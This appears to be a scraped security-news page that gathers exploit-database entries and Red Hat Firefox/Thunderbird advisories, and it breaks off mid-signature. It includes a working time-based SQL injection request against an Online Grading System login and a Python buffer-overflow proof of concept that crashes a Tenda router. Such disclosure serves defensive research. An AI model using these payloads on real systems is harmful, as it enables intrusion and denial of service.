A SQL injection vulnerability in Sourcecodester Online Grading System 1.0 allows remote attackers to execute arbitrary SQL commands via the uname parameter.

    # Exploit Title: Online Grading System 1.0 - 'uname' SQL Injection
    # Date: 2021-01-28
    # Exploit Author: Ruchi Tiwari
    # Vendor Homepage: https://www.sourcecodester.com/php/13711/online-grading-system-using-phpmysqli.html
    # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/onlinegradingsystem.zip
    # Version: 1.0
    # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
    
    ---------------------------------------------------------------------------------
    
    #parameter Vulnerable: uname
    # Injected Request
    POST /onlinegradingsystem/admin/login.php HTTP/1.1
    Host: localhost:8080
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 122
    Origin: http://localhost:8080
    Connection: close
    Referer: http://localhost:8080/onlinegradingsystem/admin/login.php
    Cookie: PHPSESSID=mavnqgmmv1o0vtqld99vtdv1us
    Upgrade-Insecure-Requests: 1
    
    uname=ruchi'||(SELECT 0x4375526c WHERE 6468=6468 AND (SELECT 4401 FROM (SELECT(SLEEP(20)))ariq))||'&pass=admin&btnlogin=
    
    #Application will load after 20 minutes.
    --------------------------------------------------------------------------------------------------------------------

CVE-2021-31650: Offensive Security’s Exploit Database Archive

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Dec. 9 and Dec. 16. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Round up for December 9 to December 16

Tenda AC15 V15.03.06.23 is vulnerable to Buffer Overflow via function formSetClientState.

/goform/SetClientState， The two variables ul\_speed and dl\_speed are user-controllable and will be spliced into the buff by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x300
p2 \= b'limitEn=1&deviceId=a&limitSpeedUp=a&limitSpeed=' + p1

p3 \= b"POST /goform/SetClientState" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-46109: IOT_Vul/Tenda/AC10/formSetClientState at main · z1r00/IOT_Vul

Red Hat Security Advisory 2022-9068-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.6.0 ESR. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:9068-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:9068  
Issue date:        2022-12-15  
CVE Names:         CVE-2022-46872 CVE-2022-46874 CVE-2022-46878  
                   CVE-2022-46880 CVE-2022-46881 CVE-2022-46882  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.6.0 ESR.

Security Fix(es):

* Mozilla: Arbitrary file read from a compromised content process  
(CVE-2022-46872)

* Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird  
102.6 (CVE-2022-46878)

* Mozilla: Use-after-free in WebGL (CVE-2022-46880)

* Mozilla: Memory corruption in WebGL (CVE-2022-46881)

* Mozilla: Drag and Dropped Filenames could have been truncated to  
malicious extensions (CVE-2022-46874)

* Mozilla: Use-after-free in WebGL (CVE-2022-46882)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2153441 - CVE-2022-46872 Mozilla: Arbitrary file read from a compromised content process  
2153449 - CVE-2022-46874 Mozilla: Drag and Dropped Filenames could have been truncated to malicious extensions  
2153454 - CVE-2022-46878 Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird 102.6  
2153463 - CVE-2022-46880 Mozilla: Use-after-free in WebGL  
2153466 - CVE-2022-46881 Mozilla: Memory corruption in WebGL  
2153467 - CVE-2022-46882 Mozilla: Use-after-free in WebGL

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
firefox-102.6.0-1.el8_6.src.rpm

aarch64:  
firefox-102.6.0-1.el8_6.aarch64.rpm  
firefox-debuginfo-102.6.0-1.el8_6.aarch64.rpm  
firefox-debugsource-102.6.0-1.el8_6.aarch64.rpm

ppc64le:  
firefox-102.6.0-1.el8_6.ppc64le.rpm  
firefox-debuginfo-102.6.0-1.el8_6.ppc64le.rpm  
firefox-debugsource-102.6.0-1.el8_6.ppc64le.rpm

s390x:  
firefox-102.6.0-1.el8_6.s390x.rpm  
firefox-debuginfo-102.6.0-1.el8_6.s390x.rpm  
firefox-debugsource-102.6.0-1.el8_6.s390x.rpm

x86_64:  
firefox-102.6.0-1.el8_6.x86_64.rpm  
firefox-debuginfo-102.6.0-1.el8_6.x86_64.rpm  
firefox-debugsource-102.6.0-1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-46872  
https://access.redhat.com/security/cve/CVE-2022-46874  
https://access.redhat.com/security/cve/CVE-2022-46878  
https://access.redhat.com/security/cve/CVE-2022-46880  
https://access.redhat.com/security/cve/CVE-2022-46881  
https://access.redhat.com/security/cve/CVE-2022-46882  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5uhDNzjgjWX9erEAQhCGhAAh9wrK1g4NxDEWTLQCDfBdEB13B24d9wk  
qBp3q/1HGrAGs6XxN+GhUmfXlimGGtpca4Fcp6+qkRAQSQwGpGkd8fpJbK7Zxgqi  
68pfB7069vlUI7+ed4OAZSaMi10uhPXlvHL94W2cxaRPjlfOY1xibOXXEuwH7ht1  
mrXbml9zDiU6JjzrqEaCtJ4P7VpMRB9JVD23WNN4HHGkB/dQ14lKhreQuhZtDlLe  
csEMm+XCtlTT/xsUxWtEK8mtsW6NQI33OXsSn1WngOIekeqrZ4nB1xq6xiYeEmh0  
JnEKacDLZYyeGviXnAVQ3cw3zkvnO2O56MCFNU1mrsf0hy4m4mW9pvEGrYhT3Xyy  
NWVDpqeoLTCzMggwIZ6XfwnRDSEjSCnqZd2d0dEUTmiSweiWrHUxYHt+tGdKt8Sh  
wKlD39NQL0zDBoTbS4w0RxBMN86bbgb+T+qXrdDnzDyRWv8vLXt2XsShWYrlEEzQ  
v7+2KuXWfqz1XRgxu8BWCwtS/FwLZwARBB2RpZ/yOCJUjYw/t6ynued1mGSI1cY1  
Zxb61b2TtI7hYyjJAX5Fqukp/NAXFH6lo760kBK8hUhq4OKe2/Au6sCurGCRHT6W  
fjKUhG+Tz+z+JaSEOsG/JwbATo+AWwYGxYYblxNva7hkZpGMrSdpI/4C6zYxxDda  
RIPXx9yvmhQ=hid3  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-9068-01

Red Hat Security Advisory 2022-9075-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.6.0. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:9075-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:9075  
Issue date:        2022-12-15  
CVE Names:         CVE-2022-45414 CVE-2022-46872 CVE-2022-46874  
                   CVE-2022-46878 CVE-2022-46880 CVE-2022-46881  
                   CVE-2022-46882  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.4  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.6.0.

Security Fix(es):

* Mozilla: Arbitrary file read from a compromised content process  
(CVE-2022-46872)

* Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird  
102.6 (CVE-2022-46878)

* Mozilla: Use-after-free in WebGL (CVE-2022-46880)

* Mozilla: Memory corruption in WebGL (CVE-2022-46881)

* Mozilla: Quoting from an HTML email with certain tags will trigger  
network requests and load remote content, regardless of a configuration to  
block remote content (CVE-2022-45414)

* Mozilla: Drag and Dropped Filenames could have been truncated to  
malicious extensions (CVE-2022-46874)

* Mozilla: Use-after-free in WebGL (CVE-2022-46882)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2149868 - CVE-2022-45414 Mozilla: Quoting from an HTML email with certain tags will trigger network requests and load remote content, regardless of a configuration to block remote content  
2153441 - CVE-2022-46872 Mozilla: Arbitrary file read from a compromised content process  
2153449 - CVE-2022-46874 Mozilla: Drag and Dropped Filenames could have been truncated to malicious extensions  
2153454 - CVE-2022-46878 Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird 102.6  
2153463 - CVE-2022-46880 Mozilla: Use-after-free in WebGL  
2153466 - CVE-2022-46881 Mozilla: Memory corruption in WebGL  
2153467 - CVE-2022-46882 Mozilla: Use-after-free in WebGL

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.4):

Source:  
thunderbird-102.6.0-2.el8_4.src.rpm

aarch64:  
thunderbird-102.6.0-2.el8_4.aarch64.rpm  
thunderbird-debuginfo-102.6.0-2.el8_4.aarch64.rpm  
thunderbird-debugsource-102.6.0-2.el8_4.aarch64.rpm

ppc64le:  
thunderbird-102.6.0-2.el8_4.ppc64le.rpm  
thunderbird-debuginfo-102.6.0-2.el8_4.ppc64le.rpm  
thunderbird-debugsource-102.6.0-2.el8_4.ppc64le.rpm

s390x:  
thunderbird-102.6.0-2.el8_4.s390x.rpm  
thunderbird-debuginfo-102.6.0-2.el8_4.s390x.rpm  
thunderbird-debugsource-102.6.0-2.el8_4.s390x.rpm

x86_64:  
thunderbird-102.6.0-2.el8_4.x86_64.rpm  
thunderbird-debuginfo-102.6.0-2.el8_4.x86_64.rpm  
thunderbird-debugsource-102.6.0-2.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-45414  
https://access.redhat.com/security/cve/CVE-2022-46872  
https://access.redhat.com/security/cve/CVE-2022-46874  
https://access.redhat.com/security/cve/CVE-2022-46878  
https://access.redhat.com/security/cve/CVE-2022-46880  
https://access.redhat.com/security/cve/CVE-2022-46881  
https://access.redhat.com/security/cve/CVE-2022-46882  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5uhFdzjgjWX9erEAQgJoA//dXoxYRc6QpIZumqvdNX8mYhEcYpd18Xv  
hefH1VzXM5q0/uNtGCQMEQ3Jty+RJ8LCgRqSQWBh3M43Oubi2d6qL0S0cq9G1DC4  
LlMMLM359VOTqIQD615Q24GVrwYlZCmOmDlzVqt7ZWBOYmnCXTboosKkGio7AY29  
+jjZEtCYcUDlhkwHmP46eMjpQnsGyD30iRFGDXo2Bh2KhmMUzWWTz6+dMdZ2TKIY  
GBTS+Pxzn7wMDabZc9iYMPbxkU1TEwzBC9P0ZCLK5FlaQSkplfvmTu3/ToecQAkc  
EJUevbeivFsPs4tusrAw7lLRR6gE3ayFXodZ9MmzVDnbG6TI5L/AhcUv7kGJ7hn8  
j+uUHpm/mPU3W4Ux3jQKR5Bl/eEmnHTaw/UMkQP6Z3WFlUJkhIhkFoIX/Xz4BePE  
2yH/nqRxHGwobnPu0wwVmFzqz5x2AXzrFGlxGPus3VbkuI/M8ExdKIweU8Xj7EwF  
w8c72PDJMCK1atFlsXmsmNHhI8aqUhwJJQiCCfWKb+eTSKJNNjsXowSBdGdK8C8L  
Chnr4cHoN9hFc/81lo67D1sO4/R5sOYR/ZoBiHM3ibwteBYJSF5tUsnQ0BEDKvJH  
c4eb66Eowc1tdrpbzELxoChIcYvjD3PeLhU66QJQbGsNXRwJc8e/aLOa2dvm2vrz  
+MxZfcAttgU=3XRU  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-9075-01

Red Hat Security Advisory 2022-9076-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.6.0. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:9076-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:9076  
Issue date:        2022-12-15  
CVE Names:         CVE-2022-45414 CVE-2022-46872 CVE-2022-46874  
                   CVE-2022-46878 CVE-2022-46880 CVE-2022-46881  
                   CVE-2022-46882  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - aarch64, ppc64le, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.6.0.

Security Fix(es):

* Mozilla: Arbitrary file read from a compromised content process  
(CVE-2022-46872)

* Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird  
102.6 (CVE-2022-46878)

* Mozilla: Use-after-free in WebGL (CVE-2022-46880)

* Mozilla: Memory corruption in WebGL (CVE-2022-46881)

* Mozilla: Quoting from an HTML email with certain tags will trigger  
network requests and load remote content, regardless of a configuration to  
block remote content (CVE-2022-45414)

* Mozilla: Drag and Dropped Filenames could have been truncated to  
malicious extensions (CVE-2022-46874)

* Mozilla: Use-after-free in WebGL (CVE-2022-46882)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2149868 - CVE-2022-45414 Mozilla: Quoting from an HTML email with certain tags will trigger network requests and load remote content, regardless of a configuration to block remote content  
2153441 - CVE-2022-46872 Mozilla: Arbitrary file read from a compromised content process  
2153449 - CVE-2022-46874 Mozilla: Drag and Dropped Filenames could have been truncated to malicious extensions  
2153454 - CVE-2022-46878 Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird 102.6  
2153463 - CVE-2022-46880 Mozilla: Use-after-free in WebGL  
2153466 - CVE-2022-46881 Mozilla: Memory corruption in WebGL  
2153467 - CVE-2022-46882 Mozilla: Use-after-free in WebGL

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

Source:  
thunderbird-102.6.0-2.el8_2.src.rpm

aarch64:  
thunderbird-102.6.0-2.el8_2.aarch64.rpm  
thunderbird-debuginfo-102.6.0-2.el8_2.aarch64.rpm  
thunderbird-debugsource-102.6.0-2.el8_2.aarch64.rpm

ppc64le:  
thunderbird-102.6.0-2.el8_2.ppc64le.rpm  
thunderbird-debuginfo-102.6.0-2.el8_2.ppc64le.rpm  
thunderbird-debugsource-102.6.0-2.el8_2.ppc64le.rpm

x86_64:  
thunderbird-102.6.0-2.el8_2.x86_64.rpm  
thunderbird-debuginfo-102.6.0-2.el8_2.x86_64.rpm  
thunderbird-debugsource-102.6.0-2.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

Source:  
thunderbird-102.6.0-2.el8_2.src.rpm

aarch64:  
thunderbird-102.6.0-2.el8_2.aarch64.rpm  
thunderbird-debuginfo-102.6.0-2.el8_2.aarch64.rpm  
thunderbird-debugsource-102.6.0-2.el8_2.aarch64.rpm

ppc64le:  
thunderbird-102.6.0-2.el8_2.ppc64le.rpm  
thunderbird-debuginfo-102.6.0-2.el8_2.ppc64le.rpm  
thunderbird-debugsource-102.6.0-2.el8_2.ppc64le.rpm

x86_64:  
thunderbird-102.6.0-2.el8_2.x86_64.rpm  
thunderbird-debuginfo-102.6.0-2.el8_2.x86_64.rpm  
thunderbird-debugsource-102.6.0-2.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

Source:  
thunderbird-102.6.0-2.el8_2.src.rpm

aarch64:  
thunderbird-102.6.0-2.el8_2.aarch64.rpm  
thunderbird-debuginfo-102.6.0-2.el8_2.aarch64.rpm  
thunderbird-debugsource-102.6.0-2.el8_2.aarch64.rpm

ppc64le:  
thunderbird-102.6.0-2.el8_2.ppc64le.rpm  
thunderbird-debuginfo-102.6.0-2.el8_2.ppc64le.rpm  
thunderbird-debugsource-102.6.0-2.el8_2.ppc64le.rpm

x86_64:  
thunderbird-102.6.0-2.el8_2.x86_64.rpm  
thunderbird-debuginfo-102.6.0-2.el8_2.x86_64.rpm  
thunderbird-debugsource-102.6.0-2.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-45414  
https://access.redhat.com/security/cve/CVE-2022-46872  
https://access.redhat.com/security/cve/CVE-2022-46874  
https://access.redhat.com/security/cve/CVE-2022-46878  
https://access.redhat.com/security/cve/CVE-2022-46880  
https://access.redhat.com/security/cve/CVE-2022-46881  
https://access.redhat.com/security/cve/CVE-2022-46882  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5ug/tzjgjWX9erEAQh0kA/9FYWQo7DPaJ42rNiE78pcFYEc6CA8ZGBP  
LHbv060pE98N3G61Kly7offDi2QrN7x0VVauoxugg9zcF8fnSTMpahR0sMZ4aAqM  
o+CaoYKvq+IvqYi+a0n+wuJFsrcNT4DsjcW3k6+52WEIPmpN4M0conmqXn0LP/yA  
Kx36GH0KJHWTnIokS1mfbUid4rtKAd3cF4KlSlbEVJu5RSPTBngAWPNld0upJLcy  
WD0B8bhSUn7H9tpMw3isqEfSDae9+YGXHkyb9MB3ICALMLlvkQibkbF9wo/1Up0M  
895bgOjQ/CoxJaHRk5pEK+fqwufiWtdABDYM12PRfk3aSdd54jDpT9HG9nV3cZHR  
boVdaeuOJFyZAzziiDZo2q9Je8Nm5ox8kgQ8UO5UY7Dr7AFNgbvIPYi3ISZ1RbZZ  
+9IuxSnW3YUrW/8QUqmyDruhS7deMYJogirvWdWwt5tSpAA5Tr7Aj1Cix3u8nHZZ  
Tej4JtE9Ch8gq7s7ppwj2hif+1JV7liUWtEp4YtKvqA+R/5svqBBwS6EI+4Woj72  
jY9YrporG0NoOPcWKt3bf5Zhr1fimiwnubJy5a6vDT9LheouWEEU+F51pz/u/ldB  
Jets+wx2yhT0fh7V/4rufKw6G3XhTo5dZwZnDzkLBDFSx57t7g5VMZta++olFUpe  
jcpjOgm6OJw=nZth  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-9076-01

Red Hat Security Advisory 2022-9070-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.6.0 ESR. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:9070-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:9070  
Issue date:        2022-12-15  
CVE Names:         CVE-2022-46872 CVE-2022-46874 CVE-2022-46878  
                   CVE-2022-46880 CVE-2022-46881 CVE-2022-46882  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.6.0 ESR.

Security Fix(es):

* Mozilla: Arbitrary file read from a compromised content process  
(CVE-2022-46872)

* Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird  
102.6 (CVE-2022-46878)

* Mozilla: Use-after-free in WebGL (CVE-2022-46880)

* Mozilla: Memory corruption in WebGL (CVE-2022-46881)

* Mozilla: Drag and Dropped Filenames could have been truncated to  
malicious extensions (CVE-2022-46874)

* Mozilla: Use-after-free in WebGL (CVE-2022-46882)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2153441 - CVE-2022-46872 Mozilla: Arbitrary file read from a compromised content process  
2153449 - CVE-2022-46874 Mozilla: Drag and Dropped Filenames could have been truncated to malicious extensions  
2153454 - CVE-2022-46878 Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird 102.6  
2153463 - CVE-2022-46880 Mozilla: Use-after-free in WebGL  
2153466 - CVE-2022-46881 Mozilla: Memory corruption in WebGL  
2153467 - CVE-2022-46882 Mozilla: Use-after-free in WebGL

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

Source:  
firefox-102.6.0-1.el8_2.src.rpm

aarch64:  
firefox-102.6.0-1.el8_2.aarch64.rpm  
firefox-debuginfo-102.6.0-1.el8_2.aarch64.rpm  
firefox-debugsource-102.6.0-1.el8_2.aarch64.rpm

ppc64le:  
firefox-102.6.0-1.el8_2.ppc64le.rpm  
firefox-debuginfo-102.6.0-1.el8_2.ppc64le.rpm  
firefox-debugsource-102.6.0-1.el8_2.ppc64le.rpm

s390x:  
firefox-102.6.0-1.el8_2.s390x.rpm  
firefox-debuginfo-102.6.0-1.el8_2.s390x.rpm  
firefox-debugsource-102.6.0-1.el8_2.s390x.rpm

x86_64:  
firefox-102.6.0-1.el8_2.x86_64.rpm  
firefox-debuginfo-102.6.0-1.el8_2.x86_64.rpm  
firefox-debugsource-102.6.0-1.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

Source:  
firefox-102.6.0-1.el8_2.src.rpm

aarch64:  
firefox-102.6.0-1.el8_2.aarch64.rpm  
firefox-debuginfo-102.6.0-1.el8_2.aarch64.rpm  
firefox-debugsource-102.6.0-1.el8_2.aarch64.rpm

ppc64le:  
firefox-102.6.0-1.el8_2.ppc64le.rpm  
firefox-debuginfo-102.6.0-1.el8_2.ppc64le.rpm  
firefox-debugsource-102.6.0-1.el8_2.ppc64le.rpm

s390x:  
firefox-102.6.0-1.el8_2.s390x.rpm  
firefox-debuginfo-102.6.0-1.el8_2.s390x.rpm  
firefox-debugsource-102.6.0-1.el8_2.s390x.rpm

x86_64:  
firefox-102.6.0-1.el8_2.x86_64.rpm  
firefox-debuginfo-102.6.0-1.el8_2.x86_64.rpm  
firefox-debugsource-102.6.0-1.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

Source:  
firefox-102.6.0-1.el8_2.src.rpm

aarch64:  
firefox-102.6.0-1.el8_2.aarch64.rpm  
firefox-debuginfo-102.6.0-1.el8_2.aarch64.rpm  
firefox-debugsource-102.6.0-1.el8_2.aarch64.rpm

ppc64le:  
firefox-102.6.0-1.el8_2.ppc64le.rpm  
firefox-debuginfo-102.6.0-1.el8_2.ppc64le.rpm  
firefox-debugsource-102.6.0-1.el8_2.ppc64le.rpm

s390x:  
firefox-102.6.0-1.el8_2.s390x.rpm  
firefox-debuginfo-102.6.0-1.el8_2.s390x.rpm  
firefox-debugsource-102.6.0-1.el8_2.s390x.rpm

x86_64:  
firefox-102.6.0-1.el8_2.x86_64.rpm  
firefox-debuginfo-102.6.0-1.el8_2.x86_64.rpm  
firefox-debugsource-102.6.0-1.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-46872  
https://access.redhat.com/security/cve/CVE-2022-46874  
https://access.redhat.com/security/cve/CVE-2022-46878  
https://access.redhat.com/security/cve/CVE-2022-46880  
https://access.redhat.com/security/cve/CVE-2022-46881  
https://access.redhat.com/security/cve/CVE-2022-46882  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5uhCNzjgjWX9erEAQherg/+LMLB/21bl4GmwLLL8/2eIGHY9tbmaSfl  
t0159LZ6kfabpE0j+buZ155ljY6aHzCuWcJBofBCIHAATgVjeZ1rzKdSEEJ2hqGt  
zrtXbpSq3e63YM9cgeeKGasOZk8GAq6IrRshqX0sE7YqkHjlxJiqZAU6GOal+RtC  
3SjBG2nCbEfgdRBPYr6GgBDN4KqvCDUdBFxK+TSv+5v2OL80m2kMpf6E7zsjPL3D  
VX6oEJ3P6gGatZZlq4BodglHPvPSL1yqwvucHQJ0V10G6WudFNBO8K6bQCLaRowl  
4BmqL82T/537ytSeClvjJQRaYH2pTuMC2PuF6Ryrrki+C/EVJYPA9Pj/NPWmsxhC  
YVKleKQ8NQpFsOJTy8NZ+STKJ0OE5Epm01AlDuiHRcr2WqqWIbd/yyYXYM9W3uYh  
